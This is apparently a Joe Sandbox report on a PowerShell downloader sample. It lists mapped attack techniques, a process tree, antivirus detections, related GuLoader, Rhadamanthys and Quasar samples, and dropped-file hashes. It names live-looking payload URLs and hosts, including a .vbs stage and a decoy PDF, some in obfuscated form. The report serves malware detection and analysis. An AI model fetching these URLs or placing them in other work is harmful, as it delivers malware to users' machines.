Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 21 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Techniques with mapped signatures, by tactic: Resource Development: Scripting (1). Execution: PowerShell (1). Persistence: Scripting (1), Registry Run Keys / Startup Folder (1), DLL Side-Loading (1). Privilege Escalation: Process Injection (11), Registry Run Keys / Startup Folder (1), DLL Side-Loading (1). Defense Evasion: Masquerading (11), Virtualization/Sandbox Evasion (31), Process Injection (11), Obfuscated Files or Information (1), DLL Side-Loading (1). Discovery: Security Software Discovery (11), Process Discovery (1), Virtualization/Sandbox Evasion (31), Application Window Discovery (1), File and Directory Discovery (1), System Information Discovery (21). Collection: Archive Collected Data (1). Command and Control: Encrypted Channel (11), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (4).
Behavior Graph (ID 1578228; sample 1M1QoJF40r.ps1; start date 19/12/2024; architecture WINDOWS; score 84)

Signatures at the top level: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Yara detected Powershell download and execute; 3 other signatures.
DNS/IP nodes at the top level: x1.i.lencr.org; www.bluemaxxlaser.com; 5 other IPs or domains.

Process tree:
powershell.exe (graph counters 16, 23)
    network: www.bluemaxxlaser.com 203.175.174.69, local port 49721 to remote port 80, SGGS-AS-APSGGSSG, Singapore
    network: astenterprises.com.pk 107.161.23.150, local port 49710 to remote port 443, RAMNODEUS, United States
    signature: Powershell creates an autostart link
    child: powershell.exe (graph counter 23)
        signature: Loading BitLocker PowerShell Module
    child: Acrobat.exe (graph counters 18, 75)
        child: AcroCEF.exe (graph counter 106)
            child: AcroCEF.exe
    child: conhost.exe
svchost.exe
    network: 127.0.0.1 (unknown, unknown)

Initial sample
Source | Detection | Scanner | Label | Link
1M1QoJF40r.ps1 | 41% | Virustotal | | Browse
1M1QoJF40r.ps1 | 34% | ReversingLabs | Script-PowerShell.Downloader.Boxter |
1M1QoJF40r.ps1 | 100% | Avira | TR/PShell.Dldr.VPA |

No Antivirus matches in the three further detection categories of the report.

URLs
Source | Detection | Scanner | Label
https://www.astpw4ntpw4rprispw4s.com.pk/ms/List%20of%20rpw4quirpw4d%20itpw4ms%20and%20spw4rvicpw4s.p | 0% | Avira URL Cloud | safe
https://www.astenterprises.com.pk/ms/List | 0% | Avira URL Cloud | safe
http://www.bluemaxxlaser.com/ms/ms.vbs | 0% | Avira URL Cloud | safe
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | 0% | Avira URL Cloud | safe
http://www.blupw4maxxlaspw4r.com/ms/ms.vbs | 0% | Avira URL Cloud | safe
http://www.bluemaxxlaser.com | 0% | Avira URL Cloud | safe
Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
astenterprises.com.pk | 107.161.23.150 | true | false | | high
www.bluemaxxlaser.com | 203.175.174.69 | true | false | | high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com | 84.201.211.18 | true | false | | high
x1.i.lencr.org | unknown | unknown | false | | high
www.astenterprises.com.pk | unknown | unknown | false | | high
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://www.bluemaxxlaser.com/ms/ms.vbs | false | Avira URL Cloud: safe | unknown
https://www.astenterprises.com.pk/ms/List%20of%20required%20items%20and%20services.pdf | false | Avira URL Cloud: safe | unknown
URLs from memory and dropped files
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.astpw4ntpw4rprispw4s.com.pk/ms/List%20of%20rpw4quirpw4d%20itpw4ms%20and%20spw4rvicpw4s.p | powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.2415392969.0000028B21A0E000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.2415392969.0000028B21B51000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/ | 2D85F72862B55C4EADD9E66E06947F3D0.6.dr | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2178720470.00000150291FE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.astenterprises.com.pk/ms/List | powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.2328899793.0000028B125D2000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2178720470.0000015028C43000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.microsoft.co | powershell.exe, 00000000.00000002.2422487333.0000028B29AE0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 00000003.00000002.2178720470.000001502931A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000007.00000003.2274805623.000002C55C430000.00000004.00000800.00020000.00000000.sdmp; edb.log.7.dr | false | | high
http://crl.ver) | svchost.exe, 00000007.00000002.3369454437.000002C55C612000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://go.micros | powershell.exe, 00000003.00000002.2178720470.0000015028C43000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.astenterprises.com.pk | powershell.exe, 00000000.00000002.2328899793.0000028B13485000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://astenterprises.com.pk | powershell.exe, 00000000.00000002.2328899793.0000028B13485000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://g.live.com/odclientsettings/Prod1C: | edb.log.7.dr | false | | high
https://www.astenterprises.com.pk | powershell.exe, 00000000.00000002.2328899793.0000028B13153000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000003.00000002.2178720470.0000015027F18000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.bluemaxxlaser.com | powershell.exe, 00000000.00000002.2328899793.0000028B134BE000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.2328899793.0000028B1351B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.2415392969.0000028B21A0E000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000000.00000002.2415392969.0000028B21B51000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2197506866.0000015037D5F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.2328899793.0000028B119A1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2178720470.0000015027CF1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.blupw4maxxlaspw4r.com/ms/ms.vbs | powershell.exe, 00000000.00000002.2328899793.0000028B11BD2000.00000004.00000800.00020000.00000000.sdmp; 1M1QoJF40r.ps1 | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.2328899793.0000028B119A1000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000003.00000002.2178720470.0000015027CF1000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
203.175.174.69 | www.bluemaxxlaser.com | Singapore | 24482 | SGGS-AS-APSGGSSG | false
107.161.23.150 | astenterprises.com.pk | United States | 3842 | RAMNODEUS | false
Private IPs: 127.0.0.1
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1578228
                                                                  Start date and time:2024-12-19 12:46:56 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 36s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:16
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:1M1QoJF40r.ps1
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:a63c8dacfe1337cf5d0654c19c97c35068cd6a257220ef56d3a51402e4f83862.ps1
                                                                  Detection:MAL
                                                                  Classification:mal84.evad.winPS1@20/61@5/3
                                                                  EGA Information:Failed
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 8
                                                                  • Number of non-executed functions: 5
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .ps1
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 23.218.208.109, 23.54.80.26, 23.54.80.57, 23.195.61.56, 2.19.198.27, 23.32.239.56, 23.32.238.18, 23.32.238.74, 13.107.246.63, 172.202.163.200, 54.224.241.105, 23.47.168.24
                                                                  • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, armmf.adobe.com, geo2.adobe.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 3924 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 4052 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
06:47:50 | API Interceptor | 66x Sleep call for process: powershell.exe modified
06:48:03 | API Interceptor | 2x Sleep call for process: svchost.exe modified
06:48:13 | API Interceptor | 2x Sleep call for process: AcroCEF.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
203.175.174.69 | 8iAcoQLc3o.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | R7FBVcp1tf.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | 2rTi9MgX25.ps1 | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | fs8cRx6Us2.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | ER4HMMzeQ3.ps1 | malicious | Unknown | www.bluemaxxlaser.com/rh/List%20of%20required%20items%20and%20services.pdf
203.175.174.69 | FjfZ7uM8zh.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | yswmdaREME.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | 0bNBLjPn56.lnk | malicious | Unknown | www.bluemaxxlaser.com/ms/ms.vbs
203.175.174.69 | 64Tgzu2FKh.exe | malicious | GuLoader, RHADAMANTHYS | bluemaxxlaser.com/rh/rheu.bin
203.175.174.69 | zp.exe | malicious | GuLoader, RHADAMANTHYS | bluemaxxlaser.com/rh/rh.bin
107.161.23.150 | 8iAcoQLc3o.ps1 | malicious | Unknown |
107.161.23.150 | R7FBVcp1tf.ps1 | malicious | Unknown |
107.161.23.150 | 2rTi9MgX25.ps1 | malicious | Unknown |
107.161.23.150 | tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS |
107.161.23.150 | FjfZ7uM8zh.lnk | malicious | Unknown |
107.161.23.150 | yswmdaREME.lnk | malicious | Unknown |
107.161.23.150 | 0bNBLjPn56.lnk | malicious | Unknown |
107.161.23.150 | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS |
107.161.23.150 | List of required items pdf.vbs | malicious | GuLoader |
107.161.23.150 | List of required items and services pdf.vbs | malicious | GuLoader |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.bluemaxxlaser.com | 8iAcoQLc3o.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | R7FBVcp1tf.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | 2rTi9MgX25.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | fs8cRx6Us2.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | ER4HMMzeQ3.ps1 | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | FjfZ7uM8zh.lnk | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | yswmdaREME.lnk | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | 0bNBLjPn56.lnk | malicious | Unknown | 203.175.174.69
www.bluemaxxlaser.com | eua.ps1 | malicious | GuLoader | 203.175.174.69
www.bluemaxxlaser.com | zp.ps1 | malicious | Unknown | 203.175.174.69
bg.microsoft.map.fastly.net | 8iAcoQLc3o.ps1 | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | R7FBVcp1tf.ps1 | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 2rTi9MgX25.ps1 | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | LFLtlBAuf7.exe | malicious | Quasar | 199.232.210.172
bg.microsoft.map.fastly.net | FjfZ7uM8zh.lnk | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | yswmdaREME.lnk | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 0bNBLjPn56.lnk | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | Dix7g8PK1e.pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | CROC000400 .pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | contract_signed.pdf | malicious | Unknown | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RAMNODEUS | 8iAcoQLc3o.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | R7FBVcp1tf.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | 2rTi9MgX25.ps1 | malicious | Unknown | 107.161.23.150
RAMNODEUS | tmkSAOF3GM.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
RAMNODEUS | FjfZ7uM8zh.lnk | malicious | Unknown | 107.161.23.150
RAMNODEUS | yswmdaREME.lnk | malicious | Unknown | 107.161.23.150
RAMNODEUS | 0bNBLjPn56.lnk | malicious | Unknown | 107.161.23.150
RAMNODEUS | List of required items and services.pdf.vbs | malicious | GuLoader, RHADAMANTHYS | 107.161.23.150
RAMNODEUS | List of required items pdf.vbs | malicious | GuLoader | 107.161.23.150
RAMNODEUS | List of required items and services pdf.vbs | malicious | GuLoader | 107.161.23.150
SGGS-AS-APSGGSSG | 8iAcoQLc3o.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | R7FBVcp1tf.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | 2rTi9MgX25.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | fs8cRx6Us2.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | ER4HMMzeQ3.ps1 | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | FjfZ7uM8zh.lnk | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | yswmdaREME.lnk | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | 0bNBLjPn56.lnk | malicious | Unknown | 203.175.174.69
SGGS-AS-APSGGSSG | teste.x86.elf | malicious | Mirai, Moobot, Okiru | 103.14.247.60
SGGS-AS-APSGGSSG | na.elf | malicious | Gafgyt | 103.14.247.29
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | 8iAcoQLc3o.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | R7FBVcp1tf.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | 2rTi9MgX25.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | fs8cRx6Us2.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | 1AqzGcCKey.exe | malicious | Quasar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | v4BET4inNV.vbs | malicious | GuLoader | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | ER4HMMzeQ3.ps1 | malicious | Unknown | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | BJtvb5Vdhh.exe | malicious | Quasar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | HquJT7q6xG.exe | malicious | Quasar | 107.161.23.150
3b5074b1b5d032e5620f69f9f700ff0e | hKvlV6A1Rl.exe | malicious | Quasar | 107.161.23.150
                                                                                      No context
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1310720
                                                                                      Entropy (8bit):0.7263273223041314
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0T:9JZj5MiKNnNhoxuu
                                                                                      MD5:6DC1940B1D04E6862F07865C3209D8C3
                                                                                      SHA1:EF5C8285475BD58475DE2C8E2328D671889CE82C
                                                                                      SHA-256:50DD168B2D438F89472EB5006D3AD81ED1618D7335E23D013FED276238DB3390
                                                                                      SHA-512:13D76C7E36E13F69D5F9CDDE2F6BE17EA0231C3CC4CE0C048DA6C61676B2DFA1350F891E16231B87C38936505F6BB9A3C664BE94011B77276801A9D27F492576
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:Extensible storage user DataBase, version 0x620, checksum 0x78ff9bd3, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                      Category:dropped
                                                                                      Size (bytes):1310720
                                                                                      Entropy (8bit):0.7556099047026907
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:VSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:VazaSvGJzYj2UlmOlOL
                                                                                      MD5:45F59A112C2575FAD855693FD2EF162E
                                                                                      SHA1:29EEACB94E29AAB06428A53B8102F1B95F870CD6
                                                                                      SHA-256:37F8791293328341255BF2C8B49B1CD701E231FC93BBEC18C9C77971CF5E78EB
                                                                                      SHA-512:9314E48432B05049064CEF46F65FB59BE7C21DEEE2E364D4C95D7031C96A22F35DA174028E4E8184B74EC6751284FE7E4F29B8805BCF1CE6832D9ECC62755AA3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:x...... .......7.......X\...;...{......................0.e......!...{?..0...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{.......................................0...|%...................'..0...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16384
                                                                                      Entropy (8bit):0.08003911600199429
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:+9FWtKYeRBiKluNaAPaU1lxvm/tolluxmO+l/SNxOf:+nyKzRBiKluNDPaUZ+egmOH
                                                                                      MD5:D827EBFFA2F7C07B0E320BEDCE1E5C34
                                                                                      SHA1:0B1811FB46CC3DF1E078C7032ECFFDE050430FFD
                                                                                      SHA-256:D5F25506F7F63ACC27044B393FDBD4E440C805780DAF08F951E9D6CEE171417D
                                                                                      SHA-512:71F139E3E810CF9904792B001857303DCB16160D34374289D63BF96927D45705F55777D4A8E239E53D6CB3AEDF67E1226B64070023D4ECC179DD767A59ABF411
                                                                                      Malicious:false
                                                                                      Preview:..X......................................;...{...0...|...!...{?..........!...{?..!...{?..g...!...{?...................'..0...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.203587485572923
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7DuBVq2PN72nKuAl9OmbnIFUt8ODudgZmw+ODudIkwON72nKuAl9OmbjLJ:7DuBVvVaHAahFUt8ODudg/+ODudI5OaC
                                                                                      MD5:BD5ECBB87E9F0BD77D2684EAAE97E797
                                                                                      SHA1:7A89C3EDDFBCFD7A03376F73AFAB6D3E98848D05
                                                                                      SHA-256:B860C06DAC7C43DC7C0199659E95838B209E7A110E04C0BE22E65FFD417C9125
                                                                                      SHA-512:40D7670F947DA0CA918AA0C04F647FDB6E095294D304826B9F52E5C896F2B64CB8CD975A7339542B803540A35F9E8F1749CFDBCC241ABE27CB452C170827989F
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:02.905 db4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:48:02.909 db4 Recovering log #3.2024/12/19-06:48:02.909 db4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):295
                                                                                      Entropy (8bit):5.203587485572923
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7DuBVq2PN72nKuAl9OmbnIFUt8ODudgZmw+ODudIkwON72nKuAl9OmbjLJ:7DuBVvVaHAahFUt8ODudg/+ODudI5OaC
                                                                                      MD5:BD5ECBB87E9F0BD77D2684EAAE97E797
                                                                                      SHA1:7A89C3EDDFBCFD7A03376F73AFAB6D3E98848D05
                                                                                      SHA-256:B860C06DAC7C43DC7C0199659E95838B209E7A110E04C0BE22E65FFD417C9125
                                                                                      SHA-512:40D7670F947DA0CA918AA0C04F647FDB6E095294D304826B9F52E5C896F2B64CB8CD975A7339542B803540A35F9E8F1749CFDBCC241ABE27CB452C170827989F
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:02.905 db4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/19-06:48:02.909 db4 Recovering log #3.2024/12/19-06:48:02.909 db4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):339
                                                                                      Entropy (8bit):5.219010898403811
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7D2G+q2PN72nKuAl9Ombzo2jMGIFUt8ODPZZmw+ODE9VkwON72nKuAl9Ombzo2jz:7D2HvVaHAa8uFUt8ODB/+ODa5OaHAa8z
                                                                                      MD5:0DDE58BF2F55046E8CC11C171AD6C2EB
                                                                                      SHA1:48D5C0E2121186D2C58F981C19D4EDD628B9B9C0
                                                                                      SHA-256:10668870987333B47B95856CCE7A668DEC4CB176592FAC55C8DACD8F6B19424B
                                                                                      SHA-512:7D7717A93ABB28E58D40B283CE9000854F7EB5E028709B3C968C5B14FBCD9F55848DBF0319B7538A9A055AB0E7381F4E0A7E8DEC1C92E96BE269B4F54CBCC57B
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:02.935 d38 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:48:02.937 d38 Recovering log #3.2024/12/19-06:48:02.938 d38 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):339
                                                                                      Entropy (8bit):5.219010898403811
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:7D2G+q2PN72nKuAl9Ombzo2jMGIFUt8ODPZZmw+ODE9VkwON72nKuAl9Ombzo2jz:7D2HvVaHAa8uFUt8ODB/+ODa5OaHAa8z
                                                                                      MD5:0DDE58BF2F55046E8CC11C171AD6C2EB
                                                                                      SHA1:48D5C0E2121186D2C58F981C19D4EDD628B9B9C0
                                                                                      SHA-256:10668870987333B47B95856CCE7A668DEC4CB176592FAC55C8DACD8F6B19424B
                                                                                      SHA-512:7D7717A93ABB28E58D40B283CE9000854F7EB5E028709B3C968C5B14FBCD9F55848DBF0319B7538A9A055AB0E7381F4E0A7E8DEC1C92E96BE269B4F54CBCC57B
                                                                                      Malicious:false
                                                                                      Preview:2024/12/19-06:48:02.935 d38 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/19-06:48:02.937 d38 Recovering log #3.2024/12/19-06:48:02.938 d38 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):475
                                                                                      Entropy (8bit):4.971824627296864
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:YH/um3RA8sq1ZhsBdOg2HIJnAcaq3QYiubcP7E4TX:Y2sRdswydMH0r3QYhbA7n7
                                                                                      MD5:F326539D084B03D88254A74D6018F692
                                                                                      SHA1:395B367E0E3554C3E78A8211F2D4B9F0F427CA87
                                                                                      SHA-256:9379694CADD7846403E1B6975502326FBC619E0E3A873BBB7BC2C03EE3623007
